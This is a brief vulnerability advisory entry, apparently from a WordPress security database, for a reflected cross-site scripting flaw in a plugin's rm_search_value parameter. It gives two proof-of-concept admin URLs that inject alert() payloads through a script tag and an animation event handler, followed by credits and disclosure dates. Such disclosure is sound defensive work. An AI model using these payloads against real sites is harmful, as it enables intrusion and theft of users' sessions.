The plugin does not sanitise and escape the rm_search_value parameter before outputting back in an attribute, leading to a Reflected Cross-Site Scripting
v < 5.0.1.2 https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="><script>alert(/XSS/)</script> v < 5.0.1.9 https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)//
AyeCode Ltd
Stiofan
Yes
2021-12-28 (about 1 years ago)
2021-12-28 (about 1 years ago)
2022-04-13 (about 9 months ago)